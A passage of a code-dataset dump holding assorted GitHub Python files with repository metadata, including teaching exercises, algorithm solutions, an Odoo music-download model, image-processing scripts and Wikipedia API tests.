echo(SUCCESS_MESSAGE)\n","repo_name":"aws/aws-sam-cli","sub_path":"samcli/commands/docs/command_context.py","file_name":"command_context.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","stars":6381,"dataset":"github-code","pt":"69"}
+{"seq_id":"7454475987","text":"# 此实例示意文件缓冲区的作用及清除方法\nfw=open(\"myflush.txt\",'w')\n\nfw.write(\"hello\") #此处执行的write操作没有真正写在磁盘上\nimport time\nwhile 1: #进入死循环\n time.sleep(0.1)\n print(time.time())\n fw.write('A'*1000+'\\n')\n\nfw.close()","repo_name":"suprviserpy632157/zdy","sub_path":"ZDY/Jan_all/pythonbase/January0116/afternoon/flush2.py","file_name":"flush2.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"21790010537","text":"import math\nimport matplotlib.pyplot as plt\n\n#ввод входных параметров\nK=float(input('Введите K: ')) #k=0,1 или бесконечность\nfik=float(input('Введите fik: ')) #fik=0 - проекция Уэтча,fik=45 - проекция Голла\n\n#создание текстового файла для записи пар значений прямоугольных координат узлов сетки\ntabl=open('pryamaya_10_145.txt','w')\ntabl.write('X;Y\\n')\n\n#описание констант\nR=6371116\nC=K+math.cos(fik*math.pi/180)\nalpha=R*math.cos(fik*math.pi/180)\n\n#расчёт и запись значений прямоугольных координат узлов сетки\nfor fi in range(-90,91,10):\n x=C*R*(math.sin(fi*math.pi/180)/(K+math.cos(fi*math.pi/180)))\n for lyambda in range(-180,181,10):\n y=alpha*lyambda*math.pi/180\n plt.scatter([lyambda],[fi], s=300)\n plt.gcf().set_size_inches((17.63, 10.88))\n tabl.write(str(x)+';'+str(y)+'\\n')\n\ntabl.close()\n","repo_name":"verlenetyree/PCproject-toolbox","sub_path":"sources/pcp_transformation/pryamaya.py","file_name":"pryamaya.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70991030940","text":"import cv2\nfrom ffpyplayer.player import MediaPlayer\nfrom ffpyplayer.writer import MediaWriter\nimport numpy as np\nimport scipy.fft as fft\nimport math\nimport random\nimport os\nvideo_path = 'movie/seal.mp4'\n\ndef changefirst(frame):\n gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)#顏色轉換->GRAY\n gray = cv2.medianBlur(gray, 7)#中值模糊\n edges = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 9, 10)#域值\n color = cv2.bilateralFilter(frame, 12, 250, 250)\n frame = cv2.bitwise_and(color, color, mask=edges)\n return frame\n\ndef changeRGB(frame,lastbinary,flag):\n frame = changefirst(frame)\n gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)#顏色轉換->GRAY\n gray = cv2.medianBlur(gray, 7)#中值模糊\n edges = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 9, 10)#域值\n gray = cv2.bitwise_not(gray,mask=edges)\n ret, binary = cv2.threshold(gray,127,255,cv2.THRESH_BINARY_INV)\n \n if flag != False:\n binarydiff = cv2.absdiff(binary,lastbinary)\n lastbinary = binary\n if flag != False:\n binary = binarydiff\n contours, hierarchy = cv2.findContours(binary,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n randomList=random.sample(range(0,255),3)\n if len(contours) > 400 :\n for i in range(400):\n frameRGB = cv2.drawContours(frame,contours,i,(randomList[0],randomList[1],randomList[2]),-1)\n elif len(contours) > 150:\n for i in range(150):\n frameRGB = cv2.drawContours(frame,contours,i,(randomList[0],randomList[1],randomList[2]),-1)\n elif len(contours) > 5:\n for i in range(5):\n frameRGB = cv2.drawContours(frame,contours,i,(randomList[0],randomList[1],randomList[2]),-1)\n frame = cv2.bitwise_and(frame,frameRGB)\n return frame,lastbinary\n\ndef floodfill(frame,height,width):\n gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)#顏色轉換->GRAY\n gray = cv2.medianBlur(gray, 7)#中值模糊\n mask=np.zeros([height+2 , width+2],np.uint8)\n loDiff = 20\n upDiff = 30\n cv2.floodFill(gray,mask,(int(height/2),int(width/2)),(255,0,0),(loDiff,loDiff,loDiff),(upDiff,upDiff,upDiff))\n #frame=cv2.bitwise_not(frame,msk)\n return frame\n\n\ndef readVideo_RGB(filename = 'movie/output_quokka.mp4'):\n video = cv2.VideoCapture(video_path)\n #player = MediaPlayer(video_path)\n fps = video.get(cv2.CAP_PROP_FPS)\n frame_nums = int(video.get(cv2.CAP_PROP_FRAME_COUNT))\n width = int(video.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(video.get(cv2.CAP_PROP_FRAME_HEIGHT))\n out = cv2.VideoWriter(filename, 0x7634706d, fps, (width, height))\n fps = int(fps)\n flag = True\n lastbinary= np.array\n for frame_idx in range(frame_nums):\n ret, frame = video.read()\n if not ret:\n print(\"Can't not receive frame\")\n break\n frame=floodfill(frame,height,width)\n if frame_idx == 0:\n flag = False\n else:\n flag = True\n frame,lastbinary = changeRGB(frame,lastbinary,flag)\n # frame = cv2.flip(frame, 1)\n #audio_frame, val = player.get_frame()\n out.write(frame)\n video.release()\n out.release()\n cv2.destroyAllWindows()","repo_name":"DrXiao/ImageProcessingProject","sub_path":"src/effect_quokka.py","file_name":"effect_quokka.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"6517384949","text":"#!/usr/bin/env python\n\ntry:\n with open('DATA/wombats.txt') as wombats_in:\n for raw_line in wombats_in:\n print(raw_line.rstrip())\n\nexcept FileNotFoundError as err:\n print(err)\n\nvalues = 5.1, 3.9, 0.0, 4.7, 'abc', 2.8\n\nfor v in values:\n try:\n result = 23.2 / float(v)\n except ZeroDivisionError as err:\n print(err)\n exit()\n except (ValueError, TypeError) as err:\n print(err)\n except Exception as err:\n print(\"Whoa! did not expect:\", err)\n else:\n print(result)\n finally:\n print(\"v is\", v)\n\n\n\n\n","repo_name":"netflow0/20190506Bettis","sub_path":"error_handling.py","file_name":"error_handling.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30225468559","text":"#!/usr/bin/python\nimport os\nimport sys\n\ndata_name = sys.argv[1]\n\ncdna_list = dict()\ncdna_h = ''\nf_cdna = open('%s.cdna_full.fa'%data_name,'r')\nfor line in f_cdna:\n if( line.startswith('>') ):\n cdna_h = line.strip().lstrip('>')\n cdna_list[cdna_h] = []\n else:\n cdna_list[cdna_h].append( line.strip() )\nf_cdna.close()\n\ncds_list = dict()\ncds_h = ''\nf_cds = open('%s.cds_full.fa'%data_name,'r')\nfor line in f_cds:\n if( line.startswith('>') ):\n cds_h = line.strip().lstrip('>')\n cds_list[cds_h] = []\n else:\n cds_list[cds_h].append( line.strip() )\nf_cds.close()\n\nprot_list = dict()\nprot_h = ''\nf_prot = open('%s.prot_full.fa'%data_name,'r')\nfor line in f_prot:\n if( line.startswith('>') ):\n prot_h = line.strip().lstrip('>')\n prot_list[prot_h] = []\n else:\n prot_list[prot_h].append( line.strip() )\nf_prot.close()\n\nprot_seq = dict()\nfor tmp_h in prot_list.keys():\n tmp_seq = ''.join(prot_list[tmp_h])\n if( tmp_seq.find('M') >= 0 ):\n tmp_M_pos = tmp_seq.index('M')\n tmp_seq = tmp_seq[tmp_M_pos:]\n\n if( not prot_seq.has_key(tmp_seq) ):\n prot_seq[tmp_seq] = []\n prot_seq[tmp_seq].append( tmp_h )\n\nf_cdna_out = open('%s.cdna_full_NR.fa'%data_name,'w')\nf_cds_out = open('%s.cds_full_NR.fa'%data_name,'w')\nf_prot_out = open('%s.prot_full_NR.fa'%data_name,'w')\nf_log_out = open('%s_full_NR.log'%data_name,'w')\nfor tmp_pseq in prot_seq.keys():\n longest_nseq = ''\n longest_cds_seq = ''\n longest_h_prot = ''\n longest_h_cdna = ''\n longest_h_cds = ''\n for tmp_h in prot_seq[tmp_pseq]:\n tmp_h_cdna = 'c.%s'%('.'.join(tmp_h.split('.')[1:]))\n tmp_h_cds = 'cds.%s'%('.'.join(tmp_h.split('.')[1:]))\n tmp_nseq = ''.join(cdna_list[tmp_h_cdna])\n tmp_cds_seq = ''.join(cds_list[tmp_h_cds])\n if( len(tmp_nseq) > len(longest_nseq) ):\n longest_h_prot = tmp_h\n longest_h_cdna = tmp_h_cdna\n longest_h_cds = tmp_h_cds\n longest_nseq = tmp_nseq\n longest_cds_seq = tmp_cds_seq\n \n f_cdna_out.write('>%s\\n%s\\n'%(longest_h_cdna,longest_nseq))\n f_cds_out.write('>%s\\n%s\\n'%(longest_h_cds,longest_cds_seq))\n if( tmp_pseq.startswith('M') ):\n f_prot_out.write('>M%s\\n%s\\n'%(longest_h_prot,tmp_pseq))\n else:\n f_prot_out.write('>%s\\n%s\\n'%(longest_h_prot,tmp_pseq))\n f_log_out.write('%s\\t%s\\n'%(longest_h_prot, ';;'.join(prot_seq[tmp_pseq])))\nf_prot_out.close()\nf_cdna_out.close()\nf_cds_out.close()\nf_log_out.close()\n","repo_name":"marcottelab/HTseq-toolbox","sub_path":"final/make-cdna_prot_NR.py","file_name":"make-cdna_prot_NR.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"74282685661","text":"import socket\nimport datetime\n\n# Define host and port\nHOST = '127.0.0.1'\nPORT = 12345\n\n# Create socket object\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# Bind socket to a specific address and port\nserver_socket.bind((HOST, PORT))\n\n# Listen for incoming connections\nserver_socket.listen()\n\nprint(f'Server listening on {HOST}:{PORT}')\n\n# Accept incoming connections\nclient_socket, address = server_socket.accept()\n\nprint(f'Connected by {address}')\n\n# Get the current date and time\nnow = datetime.datetime.now()\n\n# Send the date and time to the client\nclient_socket.send(now.strftime('%Y-%m-%d %H:%M:%S').encode())\n\n# Close the socket\nclient_socket.close()\nserver_socket.close()\n\n","repo_name":"OHMPRAKASHD/CN_SERVER_CLIENT_DATE_TIME","sub_path":"date time/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"28186623408","text":"'''\ndp를 2차원 배열로 두가지 값을 저장해서 풀었다.\ndp[i][0] = i번째 까지의 값을 더한 값. 음수가 됬다면 0으로 초기화.\ndp[i][1] = i번째 까지의 최댓값\n해당 점화식을 구하고 문제를 제출했으나 오답처리가 됬다.\n점화식에 대한 오류를 찾아봤는데 반례를 찾지못한체 \n삽질을 거듭한 끝에 모든 수가 음수였을때 발생하는 오류라는 것을 발견했다.\n해당 반례를 처리해주고 끝.\n문제를 풀다보니 이런 사소한 실수를 놓치는 경우가 많은것 같다.\n이번 경우에도 점화식을 구하는것은 쉬웠으나\n저 실수 때문에 시간이 배 이상이 걸렸다.\n반성\n'''\n\nimport sys\n\ndef read():\n return sys.stdin.readline().strip()\n\n\nn = int(read())\n\nnum = list(map(int, read().split()))\ndp = [[0, 0] for i in range(n)]\n\ndp[0][0] = num[0]\ndp[0][1] = num[0]\n\nfor i in range(1, n):\n dp[i][0] = max(dp[i-1][0] + num[i], 0) # 마지막 수를 포함. 음수라면 0으로\n dp[i][1] = max(dp[i-1][1], dp[i][0]) # 최대수\n\nmaxnum = max(num)\n\nif maxnum < 0:\n print(maxnum)\nelse:\n print(dp[n-1][1])\n","repo_name":"jinukix/Algorithm_py","sub_path":"BAEKJOON/1912 연속합.py","file_name":"1912 연속합.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"37859215173","text":"import tornado.web\nfrom tornado.escape import json_encode\nfrom base import BaseHandler\nfrom models.optimize_configuration import optimizeConfigurationModel\nfrom apscheduler.schedulers.tornado import TornadoScheduler\nfrom apscheduler.executors.pool import ThreadPoolExecutor\n# import logging\n\nscheduler = None\n\n# 初始化\ndef init_scheduler():\n global scheduler\n executor = ThreadPoolExecutor(max_workers=20) # 最多20个线程同时执行\n scheduler = TornadoScheduler()\n scheduler.add_executor(executor)\n scheduler.start()\n print('[Scheduler Init]APScheduler has been started')\n\n # logging.basicConfig()\n # logging.getLogger('apscheduler').setLevel(logging.DEBUG)\n\nclass TeskFlowHandler(BaseHandler, tornado.web.RequestHandler):\n init_scheduler()\n\n def get(self):\n sss = scheduler.get_jobs()\n print(sss)\n\n def task11(self):\n print('12323232323')\n # print(logging.DEBUG)\n\n def post(self):\n tt = scheduler.add_job(self.task11, 'cron', second=2, id=\"0001\")\n print(tt.id)\n # print('task')\n\n def put(self):\n id = self.get_argument(\"id\")\n oper = self.get_argument(\"operType\")\n rtn = scheduler.get_job(job_id=id)\n print(rtn)\n if rtn:\n if oper == 0:\n scheduler.pause_job(job_id=id)\n print('暂停成功')\n if oper == 1:\n scheduler.resume_job(job_id=id)\n print('恢复成功')\n else:\n print('未找到')\n\n def delete(self):\n id = self.get_argument(\"id\")\n rtn = scheduler.get_job(job_id=id)\n print(rtn)\n if rtn:\n scheduler.remove_job(id)\n print('移除成功')\n else:\n print('未找到')\n\n\n # user_id = self.get_argument(\"user_id\")\n # username = self.get_argument(\"username\")\n # oper_type = self.get_argument(\"oper_type\")\n # optimizeConfigurations = optimizeConfigurationModel.get_current(user_id, username, oper_type)\n # self.headers = {\n # \"User-Agent\": \"Mozilla/5.0 (Linux; Android 8.1.0; ALP-AL00 Build/HUAWEIALP-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/63.0.3239.83 Mobile Safari/537.36 T7/10.13 baiduboxapp/10.13.0.11 (Baidu; P1 8.1.0)\"\n # }\n # if optimizeConfigurations[1] == '':\n # pass\n # else:\n # html = requests.get(optimizeConfigurations[2], headers=self.headers)\n # selector = etree.HTML(html.text)\n # links = selector.xpath('//a/@href')\n # self.write(json_encode(optimizeConfigurations))\n\n\n\n # scheduler.get_job(job_id=\"0001\")\n # scheduler.shutdown()","repo_name":"happyguydev/awslsource","sub_path":"web_server/handlers/task_flow.py","file_name":"task_flow.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"5974462255","text":"#\n# Example file for working with conditional statements\n#\n\ndef main():\n x, y = 1000, 100\n\n if x < y:\n st = \"you are small\"\n elif x == y:\n st = \"you are equal\"\n\n\n else:\n st = \"greater than\"\n print(st)\n\n # conditional flow uses if, elif, else\n\n # conditional statements let you use \"a if C else b\"\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"scorpiopd/allpython","sub_path":"Files/Ch2/conditionals_start.py","file_name":"conditionals_start.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31544442742","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='fetch',\n version='0.0.4',\n author='Gergely Dervarics',\n author_email='dervarics@gmail.com',\n description='http request wrapper with simple caching',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url='https://github.com/greg76/fetch',\n project_urls = {\n \"Bug Tracker\": \"https://github.com/greg76/fetch/issues\"\n },\n license='MIT',\n packages=setuptools.find_packages(),\n install_requires=[],\n)","repo_name":"greg76/fetch","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39235755368","text":"import settings\n\nclass State(object):\n \n def __init__(self, row):\n ''' Initialize the state.'''\n \n self.date = float(row[0])\n self.oil_spot = float(row[1])\n self.oil_futures = float(row[2])\n self.oil_futures_rs = float(row[3])\n self.commodities = row[4:]\n self.ma_20 = None\n self.ma_120 = None\n \n def executeStrategy(self, strategy):\n strategy.execute(self)\n","repo_name":"MichelleArk/Quantathon","sub_path":"state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30391446935","text":"# -*- coding: utf-8 -*-\n\nimport uuid\nfrom datetime import datetime, timedelta\n\nfrom werkzeug.urls import url_encode\n\nfrom odoo import api, fields, models\n\n\nclass MusicDownload(models.Model):\n\n _name = \"oomusic.download\"\n _rec_name = \"access_token\"\n _order = \"expiration_date desc, id desc\"\n _description = \"Download links\"\n\n def _default_access_token(self):\n return uuid.uuid4().hex\n\n def _default_expiration_date(self):\n return fields.Date.to_string((datetime.now() + timedelta(days=30)).date())\n\n res_model_id = fields.Many2one(\n \"ir.model\",\n \"Related Document Model\",\n ondelete=\"cascade\",\n help=\"Model of the followed resource\",\n )\n res_model = fields.Char(\n string=\"Document Model\", related=\"res_model_id.model\", store=True, readonly=True\n )\n res_id = fields.Integer(\n string=\"Document\", required=True, help=\"Identifier of the downloaded object\"\n )\n access_token = fields.Char(\n \"Security Token\",\n index=True,\n default=lambda s: s._default_access_token(),\n help=\"Access token to access the files\",\n )\n note = fields.Char(\"Comment\")\n flatten = fields.Boolean(\n \"Flatten\", help=\"If activated, all tracks will be in the root folder of the ZIP file.\"\n )\n expiration_date = fields.Date(\n \"Expiration Date\",\n index=True,\n default=lambda s: s._default_expiration_date(),\n help=\"The link will be deactivated after this date.\",\n )\n min_delay = fields.Integer(\n \"Minimum Delay\", default=60, help=\"Minimum delay in seconds between consecutive accesses.\"\n )\n access_date = fields.Datetime(\"Last Access Date\")\n url = fields.Char(\n \"URL\",\n compute=\"_compute_url\",\n help=\"Send this URL to your contacts so they will download the tracks.\",\n )\n expired = fields.Boolean(\"Expired\", compute=\"_compute_expired\")\n user_id = fields.Many2one(\n \"res.users\",\n string=\"User\",\n index=True,\n required=True,\n ondelete=\"cascade\",\n default=lambda self: self.env.user,\n )\n\n @api.depends(\"access_token\")\n def _compute_url(self):\n base_url = self.env[\"ir.config_parameter\"].sudo().get_param(\"web.base.url\")\n for down in self:\n params = {\"token\": down.access_token}\n down.url = \"{}/oomusic/down?{}\".format(base_url, url_encode(params))\n\n def _compute_expired(self):\n for down in self:\n down.expired = bool(down.expiration_date < fields.Date.today())\n\n def _update_access_date(self, date):\n self.write({\"access_date\": date})\n self.env.cr.commit()\n\n\nclass MusicDownloadMixin(models.AbstractModel):\n _name = \"oomusic.download.mixin\"\n _description = \"Download Mixin\"\n\n download_ids = fields.One2many(\n \"oomusic.download\",\n \"res_id\",\n string=\"Download Links\",\n domain=lambda self: [(\"res_model\", \"=\", self._name)],\n auto_join=True,\n )\n\n def _get_track_ids(self):\n return self.track_ids\n\n def unlink(self):\n \"\"\" When removing a record, its rating should be deleted too. \"\"\"\n rec_ids = self.ids\n res = super(MusicDownloadMixin, self).unlink()\n self.env[\"oomusic.download\"].sudo().search(\n [(\"res_model\", \"=\", self._name), (\"res_id\", \"in\", rec_ids)]\n ).unlink()\n return res\n\n def action_create_download_link(self):\n for obj in self:\n record_model_id = (\n self.env[\"ir.model\"].sudo().search([(\"model\", \"=\", obj._name)], limit=1).id\n )\n self.env[\"oomusic.download\"].create({\"res_model_id\": record_model_id, \"res_id\": obj.id})\n return True\n\n def action_download(self):\n params = {\n \"model\": self._name,\n \"id\": self.id,\n \"flatten\": 1 if self._name in [\"oomusic.track\", \"oomusic.playlist\"] else 0,\n }\n return {\n \"type\": \"ir.actions.act_url\",\n \"url\": \"/oomusic/down_user?{}\".format(url_encode(params)),\n \"target\": \"new\",\n }\n","repo_name":"DocMarty84/oomusic","sub_path":"models/oomusic_download.py","file_name":"oomusic_download.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"20943801154","text":"import numpy as np\nfrom torchvision import datasets\n\n\ndef load_cifar10(\n dataset_path: str, is_train: bool, image_transforms: \"Albumentation Transforms\"\n) -> \"PyTorch Dataset\":\n\n \"\"\"\n Load CIFAR10 dataset using torchvision.\n ---------------------------------------\n\n - Input: dataset_path, is_train, and image_transforms.\n - Output: PyTorch Dataset object.\n \"\"\"\n\n return datasets.CIFAR10(\n root=dataset_path,\n train=is_train,\n download=True,\n transform=lambda x: image_transforms(image=np.array(x))[\"image\"],\n )\n","repo_name":"ShreyJ1729/EVA6-TSAI","sub_path":"08-AdvancedTrainingConcepts/app/datasets/cifar10.py","file_name":"cifar10.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32383136441","text":"import heapq\nimport sys\n\ndef solv(graph, updateList, start_node):\n queue = []\n heapq.heappush(queue, [0, start_node])\n updateList[start_node] = 0\n\n while queue:\n current_weight, current_node = heapq.heappop(queue)\n\n if updateList[current_node] < current_weight:\n continue\n\n for new_node, new_weight in graph[current_node]:\n next_weight = current_weight + new_weight\n\n if next_weight < updateList[new_node] and N_arr[new_node] == 0:\n updateList[new_node] = next_weight\n heapq.heappush(queue, [next_weight, new_node])\n\nif __name__ == \"__main__\":\n N, M = map(int, input().split())\n N_arr = list(map(int, input().split()))\n graph = [[] for _ in range(N+1)]\n updateList = [sys.maxsize] * (N+1)\n N_arr[-1] = 0\n\n for _ in range(M):\n a, b, t = map(int, input().split())\n graph[a].append([b, t])\n graph[b].append([a, t])\n\n solv(graph, updateList, 0)\n \n if updateList[N-1] < sys.maxsize:\n print(updateList[N-1])\n else:\n print(-1)","repo_name":"donghyo8/PS","sub_path":"donghyo/baekjoon/Graph Algorithm/17396.py","file_name":"17396.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"17097765458","text":"#!/usr/bin/python3\nimport sys\nimport random\nimport pandas as pd\n\n\n#Variables globales\nnClientes=0\nleGusta=[]\nnoLeGusta=[]\ningredientesDisponibles=set()\n\n\n#Indico que voy a coger el primer parametro como fichero de entrada\nfichero=sys.argv[1]\nsys.stdin = open(fichero, \"r\")\n\n\n\n#Leo el numero de potenciales clientes \nnClientes=int(sys.stdin.readline())\n\n\n#Por cada cliente, leemos sus preferencias que gustan y no gustan\nfor i in range(nClientes):\n leGusta.append(sys.stdin.readline().strip().split(\" \")[1:])\n noLeGusta.append(sys.stdin.readline().strip().split(\" \")[1:])\n\n #Incluimos ingredientes que gustan a la lista total de ingredientes\n for ingr in leGusta[i]:\n ingredientesDisponibles.add(ingr)\n #Incluimos ingredientes que no gustan a la lista total de ingredientes\n for ingr in noLeGusta[i]:\n ingredientesDisponibles.add(ingr)\n \n\n\n#Dataframe de lo que gusta y no gusta:\ndfGusta = pd.DataFrame(columns = ['Ingredientes', 'Conteo'])\n#Dataframe de lo que no gusta:\ndfNoGusta = pd.DataFrame(columns = ['Ingredientes', 'Conteo'])\n\nfor ingr in ingredientesDisponibles:\n #Para cada elemento, contamos cuantos hay\n elementos=sum(x.count(ingr) for x in leGusta)\n\n fila = pd.Series([ingr,elementos], index = dfGusta.columns)\n dfGusta = dfGusta.append(fila, ignore_index=True)\n \n\nfor ingr in ingredientesDisponibles:\n #Para cada elemento, contamos cuantos hay\n elementos=sum(x.count(ingr) for x in noLeGusta)\n\n fila = pd.Series([ingr,elementos], index = dfNoGusta.columns)\n dfNoGusta = dfNoGusta.append(fila, ignore_index=True)\n\ndfGusta=dfGusta.sort_values('Conteo', ascending=False)\n#dfGusta.head()\n\ndfNoGusta=dfNoGusta.sort_values('Conteo', ascending=False)\npd.set_option(\"max_rows\", None)\ndfNoGusta.head()\n\n\nlistaGusta=list(dfGusta[\"Ingredientes\"])\n\n#Imprimimos salida estandard los que no gustan\nfor x in dfNoGusta[\"Ingredientes\"]:\n if x in listaGusta:\n print(x)\n","repo_name":"sergarb1/Competitive-Programming-Solved-Problems","sub_path":"Google-HashCode/OnePizza2022/generarNoGustanOrdenado.py","file_name":"generarNoGustanOrdenado.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"es","doc_type":"code","stars":5,"dataset":"github-code","pt":"69"}
+{"seq_id":"7332401025","text":"import taichi as ti\nfrom ..Types import HittableObjectType, HitResult, make_object_constructor, HittableObject, HittableObjectDefaults\n\n\nSphere = make_object_constructor(\n HittableObjectType.SPHERE,\n HittableObject,\n HittableObjectDefaults,\n)\n\n\n@ti.func\ndef hit(sphere, ray, t_min=0.001, t_max=10e8):\n oc = ray.origin - sphere.center\n a = ray.direction.dot(ray.direction)\n b = 2 * ray.direction.dot(oc)\n c = oc.dot(oc) - sphere.radius * sphere.radius\n\n root = 0.\n discriminant = (b * b) - (4 * a * c)\n did_hit = False\n hit_point = ti.Vector([0., 0., 0.])\n hit_point_normal = ti.Vector([0., 0., 0.])\n front_face = False\n\n if discriminant > 0:\n discriminant_sqrt = ti.sqrt(discriminant)\n a2 = a * 2\n root = (-b - discriminant_sqrt) / a2\n if root < t_min or root > t_max:\n root = (-b + discriminant_sqrt) / a2\n if t_min <= root <= t_max:\n did_hit = True\n else:\n did_hit = True\n\n if did_hit:\n hit_point = ray.at(root)\n hit_point_normal = (hit_point - sphere.center) / sphere.radius\n # Check which side does the ray hit, we set the hit point normals always point outward from the surface\n if ray.direction.dot(hit_point_normal) < 0:\n front_face = True\n else:\n hit_point_normal = -hit_point_normal\n\n # return did_hit, root, self.color\n return HitResult(\n did_hit=did_hit,\n root=root,\n color=sphere.color,\n hit_point=hit_point,\n hit_point_normal=hit_point_normal,\n front_face=front_face,\n material=sphere.material,\n id=-1,\n )\n","repo_name":"zojize/taichi_course01_final","sub_path":"taichi_course01_final/HittableObject/Sphere.py","file_name":"Sphere.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"6149072717","text":"\"\"\"\nRun unit tests on the text module.\n\"\"\"\n\nimport os\nimport sys\nimport unittest\n\npath = os.path.join(os.path.dirname(__file__), '..', '..')\nif path not in sys.path:\n sys.path.append(path)\n\nfrom wikinterface import text\n\nclass TestText(unittest.TestCase):\n \"\"\"\n Test the text module.\n \"\"\"\n\n def test_collect_none(self):\n \"\"\"\n Test that when no pages are given, an empty dictionary is returned.\n \"\"\"\n\n extracts = text.collect([ ])\n self.assertFalse(len(extracts))\n\n def test_redirection(self):\n \"\"\"\n Test that pages may redirect, but the original pages are retained.\n \"\"\"\n\n page = 'Olympique Lyon'\n extracts = text.collect(page)\n self.assertTrue(page in extracts)\n\n def test_get_multiple_full(self):\n \"\"\"\n Test that when multiple full pages are requested, they are all returned, and in full.\n \"\"\"\n\n pages = [ 'Olympique Lyonnais', 'Borussia Dortmund' ]\n extracts = text.collect(pages)\n self.assertEqual(2, len(extracts))\n self.assertEqual(set(pages), set(list(extracts.keys())))\n self.assertTrue(all(len(text) for text in extracts.values()))\n\n def test_get_introduction_only(self):\n \"\"\"\n Test that when only the introduction is requested, it is returned.\n \"\"\"\n\n page = 'Olympique Lyon'\n introduction = text.collect(page, introduction_only=True)\n extract = text.collect(page, introduction_only=False)\n self.assertLess(len(introduction[page]), len(extract[page]))\n\n def test_get_multiple_introductions(self):\n \"\"\"\n Test that when multiple introductions are requested, they are all returned.\n \"\"\"\n\n pages = [ 'Olympique Lyonnais', 'Borussia Dortmund' ]\n extracts = text.collect(pages, introduction_only=True)\n self.assertEqual(2, len(extracts))\n self.assertEqual(set(pages), set(list(extracts.keys())))\n self.assertTrue(all(len(text) for text in extracts.values()))\n\n def test_get_page_with_accent(self):\n \"\"\"\n Test that pages that contain an accent in their title are retrieved normally.\n \"\"\"\n\n page = 'Ciprian Tătărușanu'\n extracts = text.collect(page, introduction_only=True)\n self.assertEqual(1, len(extracts))\n self.assertTrue(page in extracts)\n self.assertGreater(len(extracts[page]), 100)\n\n def test_get_long_list(self):\n \"\"\"\n Test that when getting a long list (greater than the stagger value), all pages are retrieed.\n \"\"\"\n\n pages = [ 'Anthony Lopes', 'Mapou Yanga-Mbiwa', 'Joachim Andersen',\n 'Rafael', 'Jason Denayer', 'Marcelo', 'Martin Terrier',\n 'Houssem Aouar', 'Moussa Dembélé', 'Bertrand Traoré',\n 'Memphis Depay', 'Thiago Mendes', 'Léo Dubois', 'Oumar Solet',\n 'Jeff Reine-Adélaïde', 'Rayan Cherki', 'Bruno Guimarães',\n 'Amine Gouiri', 'Marçal', 'Karl Toko Ekambi', 'Jean Lucas',\n 'Kenny Tete', 'Maxence Caqueret', 'Camilo Reijers de Oliveira',\n 'Maxwel Cornet', 'Youssouf Koné', 'Lucas Tousart',\n 'Ciprian Tătărușanu', 'Boubacar Fofana']\n\n extracts = text.collect(pages, introduction_only=True)\n self.assertEqual(len(pages), len(extracts))\n self.assertEqual(set(pages), set(list(extracts.keys())))\n self.assertTrue(all(len(text) > 100 for text in extracts.values()))\n","repo_name":"NicholasMamo/eld-data","sub_path":"lib/wikinterface/tests/test_text.py","file_name":"test_text.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
